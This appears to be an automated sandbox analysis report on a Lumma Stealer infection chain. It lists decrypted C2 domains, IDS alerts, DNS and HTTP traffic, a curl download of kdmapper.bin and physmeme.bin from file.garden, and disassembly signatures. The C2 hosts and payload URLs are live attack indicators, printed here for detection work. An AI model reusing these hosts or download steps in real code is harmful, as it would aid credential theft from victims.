                                Source: C:\Users\user\Desktop\mOEXVCEF.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\KiGKqBgX.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\OJAsYAeC.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\rWfFWfLI.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeJoe Sandbox ML: detected
                                Source: seoI30IZZr.exeJoe Sandbox ML: detected
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: strappystyio.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: coursedonnyre.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fossillargeiw.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tendencerangej.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appleboltelwk.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tearrybyiwo.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: captainynfanw.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: surveriysiop.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tiddymarktwo.shop
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 1AsNN2--5899070203
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                                Source: seoI30IZZr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000002.1501843564.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1495581926.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb source: seoI30IZZr.exe
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb66 source: seoI30IZZr.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1507989582.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508229989.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508518215.000001B321131000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507989582.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.7.dr

                                Spreading

                                barindex
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662DB3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF78662DB3C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0060A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0061C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0062B348 FindFirstFileExA,5_2_0062B348
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                Software Vulnerabilities

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]12_2_0040F7B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]12_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]12_2_00414031
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx12_2_0043F150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax12_2_00407170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]12_2_00441100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h12_2_0044A1E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h12_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax12_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax12_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h12_2_0044A360
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_004473FA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]12_2_00424390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]12_2_004283A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]12_2_004303B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]12_2_0043F479
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042F40F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00443420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah12_2_0044A4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp12_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp12_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]12_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0044A5E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]12_2_004206E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh12_2_00443870
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h12_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]12_2_0043A880
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_004468B9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h12_2_00426910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh12_2_004449F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_004499B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [edi]12_2_0043EA30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00415ADF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h12_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx12_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]12_2_0040DAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00426B80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh12_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh12_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00449C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]12_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]12_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00428C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]12_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]12_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]12_2_00405D10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 0000000Bh12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]12_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh12_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h12_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax12_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h12_2_0041AF50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]12_2_00410F0F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]12_2_0042DFD6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh12_2_00443FA0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.8:59161 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.8:55029 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.8:55758 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.8:58540 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.8:53563 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.8:61329 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.8:50670 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.8:50741 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.8:55461 -> 1.1.1.1:53
                                Source: Malware configuration extractorURLs: coursedonnyre.shop
                                Source: Malware configuration extractorURLs: appleboltelwk.shop
                                Source: Malware configuration extractorURLs: tiddymarktwo.shop
                                Source: Malware configuration extractorURLs: surveriysiop.shop
                                Source: Malware configuration extractorURLs: strappystyio.shop
                                Source: Malware configuration extractorURLs: captainynfanw.shop
                                Source: Malware configuration extractorURLs: tearrybyiwo.shop
                                Source: Malware configuration extractorURLs: tendencerangej.shop
                                Source: Malware configuration extractorURLs: fossillargeiw.shop
                                Source: unknownDNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: zelensky.top replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                                Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptch equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptch equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: file.garden
                                Source: global trafficDNS traffic detected: DNS query: tiddymarktwo.shop
                                Source: global trafficDNS traffic detected: DNS query: surveriysiop.shop
                                Source: global trafficDNS traffic detected: DNS query: captainynfanw.shop
                                Source: global trafficDNS traffic detected: DNS query: tearrybyiwo.shop
                                Source: global trafficDNS traffic detected: DNS query: appleboltelwk.shop
                                Source: global trafficDNS traffic detected: DNS query: tendencerangej.shop
                                Source: global trafficDNS traffic detected: DNS query: fossillargeiw.shop
                                Source: global trafficDNS traffic detected: DNS query: coursedonnyre.shop
                                Source: global trafficDNS traffic detected: DNS query: strappystyio.shop
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: zelensky.top
